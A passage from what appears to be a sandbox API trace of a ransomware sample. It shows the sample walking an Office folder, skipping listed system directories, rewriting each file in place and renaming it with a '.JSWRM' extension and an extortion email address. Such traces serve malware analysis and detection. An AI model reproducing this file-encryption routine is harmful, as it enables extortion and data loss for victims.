lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.327] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.327] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.328] CloseHandle (hObject=0x314) returned 1 [0130.328] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECRECS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrecs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECRECS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secrecs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.329] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x287, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SECURE.CFG", cAlternateFileName="")) returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2=".") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="..") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="...") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="windows") returned -1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="recovery") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="perflogs") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="documents and settings") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="system volume information") returned -1 [0130.330] lstrcmpiW (lpString1="SECURE.CFG", lpString2="msocache") returned 1 [0130.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURE.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURE.CFG", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECURE.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURE.CFG", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURE.CFG", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECURE.CFG", lpUsedDefaultChar=0x0) returned 10 [0130.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secure.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.332] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=647) returned 1 [0130.332] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.332] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x280, lpOverlapped=0x0) returned 1 [0130.333] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.333] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x280, lpOverlapped=0x0) returned 1 [0130.333] CloseHandle (hObject=0x314) returned 1 [0130.333] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURE.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secure.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURE.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\secure.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.335] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SECURL.ICO", cAlternateFileName="")) returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2=".") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="..") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="...") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="windows") returned -1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="recovery") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="perflogs") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="documents and settings") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="system volume information") returned -1 [0130.335] lstrcmpiW (lpString1="SECURL.ICO", lpString2="msocache") returned 1 [0130.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURL.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURL.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECURL.ICO", lpUsedDefaultChar=0x0) returned 10 [0130.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURL.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURL.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECURL.ICO", lpUsedDefaultChar=0x0) returned 10 [0130.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\securl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.336] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.336] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.337] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.348] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.348] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.348] CloseHandle (hObject=0x314) returned 1 [0130.348] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\securl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\securl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.349] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SECURS.ICO", cAlternateFileName="")) returned 1 [0130.349] lstrcmpiW (lpString1="SECURS.ICO", lpString2=".") returned 1 [0130.349] lstrcmpiW (lpString1="SECURS.ICO", lpString2="..") returned 1 [0130.349] lstrcmpiW (lpString1="SECURS.ICO", lpString2="...") returned 1 [0130.349] lstrcmpiW (lpString1="SECURS.ICO", lpString2="windows") returned -1 [0130.350] lstrcmpiW (lpString1="SECURS.ICO", lpString2="recovery") returned 1 [0130.350] lstrcmpiW (lpString1="SECURS.ICO", lpString2="perflogs") returned 1 [0130.350] lstrcmpiW (lpString1="SECURS.ICO", lpString2="documents and settings") returned 1 [0130.350] lstrcmpiW (lpString1="SECURS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.350] lstrcmpiW (lpString1="SECURS.ICO", lpString2="system volume information") returned -1 [0130.350] lstrcmpiW (lpString1="SECURS.ICO", lpString2="msocache") returned 1 [0130.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURS.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURS.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECURS.ICO", lpUsedDefaultChar=0x0) returned 10 [0130.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURS.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SECURS.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SECURS.ICO", lpUsedDefaultChar=0x0) returned 10 [0130.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\securs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.351] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.351] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.351] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.353] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.353] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.353] CloseHandle (hObject=0x314) returned 1 [0130.353] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\securs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SECURS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\securs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.354] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x303, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SHARING.CFG", cAlternateFileName="")) returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2=".") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="..") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="...") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="windows") returned -1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="recovery") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="perflogs") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="documents and settings") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="system volume information") returned -1 [0130.354] lstrcmpiW (lpString1="SHARING.CFG", lpString2="msocache") returned 1 [0130.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHARING.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHARING.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHARING.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHARING.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHARING.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHARING.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\sharing.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.355] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=771) returned 1 [0130.355] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.356] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0130.357] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.357] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0130.357] CloseHandle (hObject=0x314) returned 1 [0130.357] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SHARING.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\sharing.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SHARING.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\sharing.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.358] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SIGN.CFG", cAlternateFileName="")) returned 1 [0130.358] lstrcmpiW (lpString1="SIGN.CFG", lpString2=".") returned 1 [0130.358] lstrcmpiW (lpString1="SIGN.CFG", lpString2="..") returned 1 [0130.358] lstrcmpiW (lpString1="SIGN.CFG", lpString2="...") returned 1 [0130.358] lstrcmpiW (lpString1="SIGN.CFG", lpString2="windows") returned -1 [0130.358] lstrcmpiW (lpString1="SIGN.CFG", lpString2="recovery") returned 1 [0130.358] lstrcmpiW (lpString1="SIGN.CFG", lpString2="perflogs") returned 1 [0130.359] lstrcmpiW (lpString1="SIGN.CFG", lpString2="documents and settings") returned 1 [0130.359] lstrcmpiW (lpString1="SIGN.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.359] lstrcmpiW (lpString1="SIGN.CFG", lpString2="system volume information") returned -1 [0130.359] lstrcmpiW (lpString1="SIGN.CFG", lpString2="msocache") returned 1 [0130.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.CFG", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN.CFG", lpUsedDefaultChar=0x0) returned 8 [0130.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SIGN.CFG", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SIGN.CFG", lpUsedDefaultChar=0x0) returned 8 [0130.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\sign.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.378] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=664) returned 1 [0130.378] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.378] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x290, lpOverlapped=0x0) returned 1 [0130.379] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.379] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x290, lpOverlapped=0x0) returned 1 [0130.379] CloseHandle (hObject=0x314) returned 1 [0130.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGN.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\sign.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SIGN.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\sign.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.390] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4881c8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4881c8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SIGNL.ICO", cAlternateFileName="")) returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2=".") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="..") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="...") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="windows") returned -1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="recovery") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", lpString2="perflogs") returned 1 [0130.390] lstrcmpiW (lpString1="SIGNL.ICO", 